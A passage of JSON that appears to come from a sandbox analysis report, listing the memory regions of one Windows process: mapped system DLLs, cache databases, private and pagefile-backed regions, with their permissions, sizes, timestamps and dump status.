[ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 159744, "start_va": 30998528, "type": "region", "version": 1 }, "end_va": 31158271, "entry_point": 30998528, "filename": "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db", "id": "region_805", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db", "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db", "region_type": "memory_mapped_file", "start_va": 30998528, "timestamp": "00:01:01.605", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 31199231, "entry_point": 0, "filename": null, "id": "region_806", "name": "pagefile_0x0000000001dc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31195136, "timestamp": "00:01:01.606", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000807-addr_0x0000000001dd0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31260672, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_807", "name": "private_0x0000000001dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31260672, "timestamp": "00:01:01.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 34729983, "entry_point": 31784960, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_808", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 31784960, "timestamp": "00:01:01.606", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000809-addr_0x0000000002140000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 35389439, "entry_point": 0, "filename": null, "id": "region_809", "name": "private_0x0000000002140000", "norm_filename": null, "region_type": "private_memory", "start_va": 34865152, "timestamp": "00:01:01.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 35389440, "type": "region", "version": 1 }, "end_va": 39530495, "entry_point": 0, "filename": null, "id": "region_810", "name": "pagefile_0x00000000021c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35389440, "timestamp": "00:01:01.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791716921344, "type": "region", "version": 1 }, "end_va": 8791717273599, "entry_point": 8791716969408, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_811", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791716921344, "timestamp": "00:01:01.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728902143, "entry_point": 8791728721936, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_812", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:01:01.607", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791729111040, "type": "region", "version": 1 }, "end_va": 8791730339839, "entry_point": 8791729149116, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_813", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791729111040, "timestamp": "00:01:01.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791730683904, "type": "region", "version": 1 }, "end_va": 8791732731903, "entry_point": 8791732308260, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_814", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791730683904, "timestamp": "00:01:01.608", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791739596800, "type": "region", "version": 1 }, "end_va": 8791739719679, "entry_point": 8791739601848, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_815", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791739596800, "timestamp": "00:01:01.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791751393280, "type": "region", "version": 1 }, "end_va": 8791751454719, "entry_point": 8791751397392, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_816", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751393280, "timestamp": "00:01:01.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791752507392, "type": "region", "version": 1 }, "end_va": 8791752568831, "entry_point": 8791752513968, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_817", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791752507392, "timestamp": "00:01:01.610", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791754145792, "type": "region", "version": 1 }, "end_va": 8791754366975, "entry_point": 8791754151028, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_818", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791754145792, "timestamp": "00:01:01.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791754407936, "type": "region", "version": 1 }, "end_va": 8791754514431, "entry_point": 8791754413400, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_819", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791754407936, "timestamp": "00:01:01.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791757750272, "type": "region", "version": 1 }, "end_va": 8791758376959, "entry_point": 8791757757456, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_820", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791757750272, "timestamp": "00:01:01.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791764172800, "type": "region", "version": 1 }, "end_va": 8791778361343, "entry_point": 8791764684476, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_821", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791764172800, "timestamp": "00:01:01.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791781212160, "type": "region", "version": 1 }, "end_va": 8791781548031, "entry_point": 8791781216468, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_822", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791781212160, "timestamp": "00:01:01.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791782129664, "type": "region", "version": 1 }, "end_va": 8791784058879, "entry_point": 8791782133776, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_823", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791782129664, "timestamp": "00:01:01.615", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000824-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_824", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:01.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 29949952, "type": "region", "version": 1 }, "end_va": 29966335, "entry_point": 29949952, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_826", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 29949952, "timestamp": "00:01:01.793", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 34734080, "type": "region", "version": 1 }, "end_va": 34750463, "entry_point": 34734080, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_827", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 34734080, "timestamp": "00:01:01.795", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 39583744, "type": "region", "version": 1 }, "end_va": 39780351, "entry_point": 39583744, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db", "id": "region_828", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db", "region_type": "memory_mapped_file", "start_va": 39583744, "timestamp": "00:01:01.795", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 39780352, "type": "region", "version": 1 }, "end_va": 40198143, "entry_point": 39780352, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_829", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 39780352, "timestamp": "00:01:01.795", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000830-addr_0x0000000002680000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 40370176, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_830", "name": "private_0x0000000002680000", "norm_filename": null, "region_type": "private_memory", "start_va": 40370176, "timestamp": "00:01:01.796", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000831-addr_0x00000000027c0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41680896, "type": "region", "version": 1 }, "end_va": 42205183, "entry_point": 0, "filename": null, "id": "region_831", "name": "private_0x00000000027c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41680896, "timestamp": "00:01:01.796", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791649812480, "type": "region", "version": 1 }, "end_va": 8791649861631, "entry_point": 8791649817472, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_832", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791649812480, "timestamp": "00:01:01.796", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791649878016, "type": "region", "version": 1 }, "end_va": 8791650091007, "entry_point": 8791649884304, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_833", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791649878016, "timestamp": "00:01:01.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791675109376, "type": "region", "version": 1 }, "end_va": 8791675633663, "entry_point": 8791675128460, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_834", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791675109376, "timestamp": "00:01:01.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791675633664, "type": "region", "version": 1 }, "end_va": 8791675695103, "entry_point": 8791675637824, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_835", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791675633664, "timestamp": "00:01:01.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791696343040, "type": "region", "version": 1 }, "end_va": 8791696699391, "entry_point": 8791696347416, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_836", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791696343040, "timestamp": "00:01:01.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791723343872, "type": "region", "version": 1 }, "end_va": 8791723388927, "entry_point": 8791723364236, "filename": "\\Windows\\System32\\slc.dll", "id": "region_837", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791723343872, "timestamp": "00:01:01.799", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791750344704, "type": "region", "version": 1 }, "end_va": 8791750488063, "entry_point": 8791750349208, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_838", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791750344704, "timestamp": "00:01:01.799", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000839-addr_0x000007fffffd6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092850176, "type": "region", "version": 1 }, "end_va": 8796092858367, "entry_point": 0, "filename": null, "id": "region_839", "name": "private_0x000007fffffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092850176, "timestamp": "00:01:01.800", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000840-addr_0x000007fffffd8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092858368, "type": "region", "version": 1 }, "end_va": 8796092866559, "entry_point": 0, "filename": null, "id": "region_840", "name": "private_0x000007fffffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092858368, "timestamp": "00:01:01.800", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791593713664, "type": "region", "version": 1 }, "end_va": 8791594340351, "entry_point": 8791593723504, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_841", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791593713664, "timestamp": "00:01:01.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791741825024, "type": "region", "version": 1 }, "end_va": 8791742115839, "entry_point": 8791741829220, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_842", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791741825024, "timestamp": "00:01:01.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791746347008, "type": "region", "version": 1 }, "end_va": 8791746441215, "entry_point": 8791746359992, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_843", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791746347008, "timestamp": "00:01:01.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791737565184, "type": "region", "version": 1 }, "end_va": 8791737614335, "entry_point": 8791737569380, "filename": "\\Windows\\System32\\version.dll", "id": "region_844", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791737565184, "timestamp": "00:01:01.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 34799616, "type": "region", "version": 1 }, "end_va": 34803711, "entry_point": 0, "filename": null, "id": "region_845", "name": "pagefile_0x0000000002130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 34799616, "timestamp": "00:01:01.854", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000846-addr_0x0000000002750000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 41222144, "type": "region", "version": 1 }, "end_va": 41287679, "entry_point": 0, "filename": null, "id": "region_846", "name": "private_0x0000000002750000", "norm_filename": null, "region_type": "private_memory", "start_va": 41222144, "timestamp": "00:01:01.855", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000847-addr_0x0000000002840000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 42205184, "type": "region", "version": 1 }, "end_va": 43253759, "entry_point": 0, "filename": null, "id": "region_847", "name": "private_0x0000000002840000", "norm_filename": null, "region_type": "private_memory", "start_va": 42205184, "timestamp": "00:01:01.855", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000848-addr_0x0000000002a20000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 44695551, "entry_point": 0, "filename": null, "id": "region_848", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:01:01.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1964507136, "type": "region", "version": 1 }, "end_va": 1965330431, "entry_point": 1964518896, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_849", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1964507136, "timestamp": "00:01:01.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791387078656, "type": "region", "version": 1 }, "end_va": 8791397158911, "entry_point": 8791391576832, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_850", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791387078656, "timestamp": "00:01:01.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 40239104, "type": "region", "version": 1 }, "end_va": 40251391, "entry_point": 0, "filename": null, "id": "region_851", "name": "pagefile_0x0000000002660000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40239104, "timestamp": "00:01:02.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 40304640, "type": "region", "version": 1 }, "end_va": 40308735, "entry_point": 0, "filename": null, "id": "region_852", "name": "pagefile_0x0000000002670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40304640, "timestamp": "00:01:02.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000853-addr_0x0000000002700000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 41025535, "entry_point": 0, "filename": null, "id": "region_853", "name": "private_0x0000000002700000", "norm_filename": null, "region_type": "private_memory", "start_va": 40894464, "timestamp": "00:01:02.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000854-addr_0x00000000029a0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 44171263, "entry_point": 0, "filename": null, "id": "region_854", "name": "private_0x00000000029a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43646976, "timestamp": "00:01:02.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000855-addr_0x0000000002aa0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 44695552, "type": "region", "version": 1 }, "end_va": 45748223, "entry_point": 0, "filename": null, "id": "region_855", "name": "private_0x0000000002aa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 44695552, "timestamp": "00:01:02.004", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000856-addr_0x0000000002c10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 46202880, "type": "region", "version": 1 }, "end_va": 46727167, "entry_point": 0, "filename": null, "id": "region_856", "name": "private_0x0000000002c10000", "norm_filename": null, "region_type": "private_memory", "start_va": 46202880, "timestamp": "00:01:02.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 46727168, "type": "region", "version": 1 }, "end_va": 449380351, "entry_point": 0, "filename": null, "id": "region_857", "name": "private_0x0000000002c90000", "norm_filename": null, "region_type": "private_memory", "start_va": 46727168, "timestamp": "00:01:02.012", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000858-addr_0x000000001ac90000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 449380352, "type": "region", "version": 1 }, "end_va": 456523775, "entry_point": 0, "filename": null, "id": "region_858", "name": "private_0x000000001ac90000", "norm_filename": null, "region_type": "private_memory", "start_va": 